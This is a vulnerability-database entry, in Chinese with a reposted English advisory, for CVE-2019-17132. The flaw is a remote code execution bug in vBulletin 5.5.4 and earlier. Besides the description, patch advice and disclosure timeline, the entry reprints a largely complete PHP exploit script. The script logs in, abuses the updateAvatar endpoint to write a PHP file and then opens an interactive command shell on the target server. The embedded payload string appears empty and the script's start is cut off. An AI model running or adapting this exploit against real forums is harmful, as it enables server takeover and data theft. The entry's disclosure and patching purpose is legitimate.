vBulletin 安全漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1771910 漏洞类型 输入验证错误
发布时间 2019-10-08 更新时间 2020-07-27
CVE编号 CVE-2019-17132 CNNVD-ID CNNVD-201910-182
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2019100044
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201910-182
|漏洞详情
vBulletin是美国InternetBrands和vBulletinSolutions公司的一款基于PHP和MySQL的开源Web论坛程序。 vBulletin 5.5.4及之前版本中存在输入验证错误漏洞。远程攻击者可借助特制请求利用该漏洞在系统上执行任意PHP代码。
|漏洞EXP
---------------------------------------------------------------------
vBulletin <= 5.5.4 (updateAvatar) Remote Code Execution Vulnerability
---------------------------------------------------------------------


[-] Software Link:

https://www.vbulletin.com/


[-] Affected Versions:

Version 5.5.4 and prior versions.


[-] Vulnerability Description:

User input passed through the "data[extension]" and "data[filedata]" 
parameters
to the "ajax/api/user/updateAvatar" endpoint is not properly validated 
before
being used to update users' avatars. This can be exploited to inject and 
execute
arbitrary PHP code. Successful exploitation of this vulnerability 
requires
the "Save Avatars as Files" option to be enabled (disabled by default).


[-] Proof of Concept:

http://karmainsecurity.com/pocs/CVE-2019-17132

-----
\n"; print "\nExample....: php $argv[0] http://localhost/vb/ user passwd"; print "\nExample....: php $argv[0] https://vbulletin.com/ evil hacker\n\n"; die(); } list($url, $user, $pass) = [$argv[1], $argv[2], $argv[3]]; $ch = curl_init(); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_HEADER, true); print "\n[-] Logging in with username '{$user}' and password '{$pass}'\n"; curl_setopt($ch, CURLOPT_URL, $url); if (!preg_match("/Cookie: .*sessionhash=[^;]+/", curl_exec($ch), $sid)) die("[-] Session ID not found!\n"); curl_setopt($ch, CURLOPT_URL, "{$url}?routestring=auth/login"); curl_setopt($ch, CURLOPT_HTTPHEADER, $sid); curl_setopt($ch, CURLOPT_POSTFIELDS, "username={$user}&password={$pass}"); if (!preg_match("/Cookie: .*sessionhash=[^;]+/", curl_exec($ch), $sid)) die("[-] Login failed!\n"); print "[-] Logged-in! Retrieving security token...\n"; curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_POST, false); curl_setopt($ch, CURLOPT_HTTPHEADER, $sid); if (!preg_match('/token": "([^"]+)"/', curl_exec($ch), $token)) die("[-] Security token not found!\n"); print "[-] Uploading new avatar...\n"; $params = ["profilePhotoFile" => new CURLFile("avatar.jpeg"), "securitytoken" => $token[1]]; curl_setopt($ch, CURLOPT_URL, "{$url}?routestring=profile/upload-profilepicture"); curl_setopt($ch, CURLOPT_POSTFIELDS, $params); curl_setopt($ch, CURLOPT_HEADER, false); if (($path = (json_decode(curl_exec($ch)))->avatarpath) == null) die("[-] Upload failed!\n"); if (preg_match('/image\.php\?/', $path)) die("[-] Sorry, the 'Save Avatars as Files' option is disabled!\n"); print "[-] Updating avatar with PHP shell...\n"; $php_code = ''; $params = ["routestring" => "ajax/api/user/updateAvatar", "userid" => 0, "avatarid" => 0, "data[extension]" => "php", "data[filedata]" => $php_code, "securitytoken" => $token[1]]; curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($params)); if (curl_exec($ch) !== "true") die("[-] Update failed!\n"); print "[-] Launching shell...\n"; preg_match('/(\d+)\.jpeg/', $path, $m); $path = preg_replace('/(\d+)\.jpeg/', ($m[1]+1).".php", $path); curl_setopt($ch, CURLOPT_URL, "{$url}core/{$path}"); curl_setopt($ch, CURLOPT_POST, false); while(1) { print "\nvb-shell# "; if (($cmd = trim(fgets(STDIN))) == "exit") break; curl_setopt($ch, CURLOPT_HTTPHEADER, ["CMD: ".base64_encode($cmd)]); preg_match('/____(.*)/s', curl_exec($ch), $m) ? print $m[1] : die("\n[-] Exploit failed!\n"); } 
-----


[-] Solution:

Apply the vendor Security Patch Level 2 or upgrade to version 5.5.5 or 
later.


[-] Disclosure Timeline:

[30/09/2019] - Vendor notified
[03/10/2019] - Patch released: https://bit.ly/2OptAzI
[04/10/2019] - CVE number assigned
[07/10/2019] - Public disclosure


[-] CVE Reference:

The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the name CVE-2019-17132 to this vulnerability.


[-] Credits:

Vulnerability discovered by Egidio Romano.


[-] Original Advisory:

http://karmainsecurity.com/KIS-2019-02



|参考资料

来源:forum.vbulletin.com

链接:https://forum.vbulletin.com/forum/vbulletin-announcements/vbulletin-announcements_aa/4423646-vbulletin-5-5-x-5-5-2-5-5-3-and-5-5-4-security-patch-level-2


来源:packetstormsecurity.com

链接:https://packetstormsecurity.com/files/154759/vBulletin-5.5.4-Remote-Code-Execution.html


来源:nvd.nist.gov

链接:https://nvd.nist.gov/vuln/detail/CVE-2019-17132